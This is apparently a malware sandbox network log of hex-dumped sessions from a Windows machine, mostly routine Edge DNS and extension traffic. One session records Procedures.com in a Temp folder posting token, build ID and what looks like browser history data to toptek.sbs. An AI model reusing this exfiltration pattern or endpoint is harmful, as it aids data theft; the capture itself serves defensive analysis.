                                                                                                                                                                                                                                                                                                  Accept-Language: *
                                                                                                                                                                                                                                                                                                  User-Agent: Chrome
                                                                                                                                                                                                                                                                                                  Accept-Encoding: identity
                                                                                                                                                                                                                                                                                                  Content-Type: application/dns-message
                                                                                                                                                                                                                                                                                                  2024-12-23 05:24:29 UTC128OUTData Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                                  Data Ascii: wwwgstaticcom)TP
                                                                                                                                                                                                                                                                                                  2024-12-23 05:24:29 UTC247INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                                                                                                                                                  Date: Mon, 23 Dec 2024 05:24:29 GMT
                                                                                                                                                                                                                                                                                                  Content-Type: application/dns-message
                                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                                  Content-Length: 468
                                                                                                                                                                                                                                                                                                  CF-RAY: 8f65ecf5ffecc338-EWR
                                                                                                                                                                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                                  2024-12-23 05:24:29 UTC468INData Raw: 00 00 81 80 00 01 00 01 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 c0 0c 00 01 00 01 00 00 01 13 00 04 8e fb 29 03 00 00 29 04 d0 00 00 00 00 01 98 00 0c 01 94 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                                  Data Ascii: wwwgstaticcom))


                                                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                  21192.168.2.549937162.159.61.34436772C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                  2024-12-23 05:24:29 UTC245OUTPOST /dns-query HTTP/1.1
                                                                                                                                                                                                                                                                                                  Host: chrome.cloudflare-dns.com
                                                                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                                                                  Content-Length: 128
                                                                                                                                                                                                                                                                                                  Accept: application/dns-message
                                                                                                                                                                                                                                                                                                  Accept-Language: *
                                                                                                                                                                                                                                                                                                  User-Agent: Chrome
                                                                                                                                                                                                                                                                                                  Accept-Encoding: identity
                                                                                                                                                                                                                                                                                                  Content-Type: application/dns-message
                                                                                                                                                                                                                                                                                                  2024-12-23 05:24:29 UTC128OUTData Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                                  Data Ascii: wwwgstaticcom)TP
                                                                                                                                                                                                                                                                                                  2024-12-23 05:24:29 UTC247INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                                                                                                                                                  Date: Mon, 23 Dec 2024 05:24:29 GMT
                                                                                                                                                                                                                                                                                                  Content-Type: application/dns-message
                                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                                  Content-Length: 468
                                                                                                                                                                                                                                                                                                  CF-RAY: 8f65ecf5fc67c336-EWR
                                                                                                                                                                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                                  2024-12-23 05:24:29 UTC468INData Raw: 00 00 81 80 00 01 00 01 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 c0 0c 00 01 00 01 00 00 01 19 00 04 8e fa 50 23 00 00 29 04 d0 00 00 00 00 01 98 00 0c 01 94 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                                  Data Ascii: wwwgstaticcomP#)


                                                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                  22192.168.2.549938162.159.61.34436772C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                  2024-12-23 05:24:29 UTC245OUTPOST /dns-query HTTP/1.1
                                                                                                                                                                                                                                                                                                  Host: chrome.cloudflare-dns.com
                                                                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                                                                  Content-Length: 128
                                                                                                                                                                                                                                                                                                  Accept: application/dns-message
                                                                                                                                                                                                                                                                                                  Accept-Language: *
                                                                                                                                                                                                                                                                                                  User-Agent: Chrome
                                                                                                                                                                                                                                                                                                  Accept-Encoding: identity
                                                                                                                                                                                                                                                                                                  Content-Type: application/dns-message
                                                                                                                                                                                                                                                                                                  2024-12-23 05:24:29 UTC128OUTData Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                                  Data Ascii: wwwgstaticcom)TP
                                                                                                                                                                                                                                                                                                  2024-12-23 05:24:29 UTC247INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                                                                                                                                                  Date: Mon, 23 Dec 2024 05:24:29 GMT
                                                                                                                                                                                                                                                                                                  Content-Type: application/dns-message
                                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                                  Content-Length: 468
                                                                                                                                                                                                                                                                                                  CF-RAY: 8f65ecf5fa1d43fa-EWR
                                                                                                                                                                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                                  2024-12-23 05:24:29 UTC468INData Raw: 00 00 81 80 00 01 00 01 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 c0 0c 00 01 00 01 00 00 01 03 00 04 8e fa 41 a3 00 00 29 04 d0 00 00 00 00 01 98 00 0c 01 94 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                                  Data Ascii: wwwgstaticcomA)


                                                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                  23192.168.2.54994894.130.188.574431576C:\Users\user\AppData\Local\Temp\139308\Procedures.com
                                                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                  2024-12-23 05:24:29 UTC325OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                                  Content-Type: multipart/form-data; boundary=----GV3W4E37YCBAAIW4ECJW
                                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                                  Host: toptek.sbs
                                                                                                                                                                                                                                                                                                  Content-Length: 207993
                                                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                  2024-12-23 05:24:29 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 47 56 33 57 34 45 33 37 59 43 42 41 41 49 57 34 45 43 4a 57 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 65 38 32 62 32 38 63 66 63 32 36 64 35 61 61 35 30 32 39 32 66 36 35 35 33 30 36 35 33 30 32 0d 0a 2d 2d 2d 2d 2d 2d 47 56 33 57 34 45 33 37 59 43 42 41 41 49 57 34 45 43 4a 57 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 63 31 34 30 30 66 31 31 35 31 33 31 65 31 66 61 38 34 65 61 39 38 35 39 39 64 35 33 64 30 62 64 0d 0a 2d 2d 2d 2d 2d 2d 47 56 33 57 34 45 33 37 59 43 42 41 41 49 57 34 45 43 4a 57 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                                  Data Ascii: ------GV3W4E37YCBAAIW4ECJWContent-Disposition: form-data; name="token"0e82b28cfc26d5aa50292f6553065302------GV3W4E37YCBAAIW4ECJWContent-Disposition: form-data; name="build_id"c1400f115131e1fa84ea98599d53d0bd------GV3W4E37YCBAAIW4ECJWCont
                                                                                                                                                                                                                                                                                                  2024-12-23 05:24:29 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                  Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                  2024-12-23 05:24:29 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                  Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                  2024-12-23 05:24:29 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                  Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                  2024-12-23 05:24:29 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                  Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                  2024-12-23 05:24:29 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                  Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                  2024-12-23 05:24:29 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                  Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                  2024-12-23 05:24:29 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                  Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                  2024-12-23 05:24:29 UTC16355OUTData Raw: 4d 54 43 6c 51 42 41 59 58 4b 79 73 42 57 58 52 68 59 6d 78 6c 63 33 46 73 61 58 52 6c 58 33 4e 6c 63 58 56 6c 62 6d 4e 6c 63 33 46 73 61 58 52 6c 58 33 4e 6c 63 58 56 6c 62 6d 4e 6c 42 55 4e 53 52 55 46 55 52 53 42 55 51 55 4a 4d 52 53 42 7a 63 57 78 70 64 47 56 66 63 32 56 78 64 57 56 75 59 32 55 6f 62 6d 46 74 5a 53 78 7a 5a 58 45 70 67 58 38 44 42 78 63 56 46 51 47 44 59 58 52 68 59 6d 78 6c 64 58 4a 73 63 33 56 79 62 48 4d 45 51 31 4a 46 51 56 52 46 49 46 52 42 51 6b 78 46 49 48 56 79 62 48 4d 6f 61 57 51 67 53 55 35 55 52 55 64 46 55 69 42 51 55 6b 6c 4e 51 56 4a 5a 49 45 74 46 57 53 42 42 56 56 52 50 53 55 35 44 55 6b 56 4e 52 55 35 55 4c 48 56 79 62 43 42 4d 54 30 35 48 56 6b 46 53 51 30 68 42 55 69 78 30 61 58 52 73 5a 53 42 4d 54 30 35 48 56 6b
                                                                                                                                                                                                                                                                                                  Data Ascii: MTClQBAYXKysBWXRhYmxlc3FsaXRlX3NlcXVlbmNlc3FsaXRlX3NlcXVlbmNlBUNSRUFURSBUQUJMRSBzcWxpdGVfc2VxdWVuY2UobmFtZSxzZXEpgX8DBxcVFQGDYXRhYmxldXJsc3VybHMEQ1JFQVRFIFRBQkxFIHVybHMoaWQgSU5URUdFUiBQUklNQVJZIEtFWSBBVVRPSU5DUkVNRU5ULHVybCBMT05HVkFSQ0hBUix0aXRsZSBMT05HVk
                                                                                                                                                                                                                                                                                                  2024-12-23 05:24:29 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                  Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                  2024-12-23 05:24:31 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                                                                  Date: Mon, 23 Dec 2024 05:24:31 GMT
                                                                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                  Connection: close


                                                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                  24192.168.2.549926142.250.181.654436772C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                  2024-12-23 05:24:30 UTC594OUTGET /crx/blobs/AW50ZFvmkG4OHGgRTAu7ED1s4Osp5h4hBv39bA-6HcwOhSY7CGpTiD4wJ46Ud6Bo6P7yWyrRWCx-L37vtqrnUs3U44hGlerneoOywl1xhFHZUyPx_GIMNYxNDzQk9TJs4K4AxlKa5fjk7yW6cw-fwnpof9qnkobSLXrM/GHBMNNJOOEKPMOECNNNILNNBDLOLHKHI_1_85_1_0.crx HTTP/1.1
                                                                                                                                                                                                                                                                                                  Host: clients2.googleusercontent.com
                                                                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                                                                  Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                  Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                                                                  2024-12-23 05:24:30 UTC570INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                  Content-Length: 154477
                                                                                                                                                                                                                                                                                                  X-GUploader-UploadID: AFiumC6peKbeaD5AAOFIFpIY4iRMz0r723tdQqjZ-_sZLw4H2KJ7KzMpVkWBpbUuXqhVSHwrJ2iSn3M
                                                                                                                                                                                                                                                                                                  X-Goog-Hash: crc32c=F5qq4g==
                                                                                                                                                                                                                                                                                                  Server: UploadServer
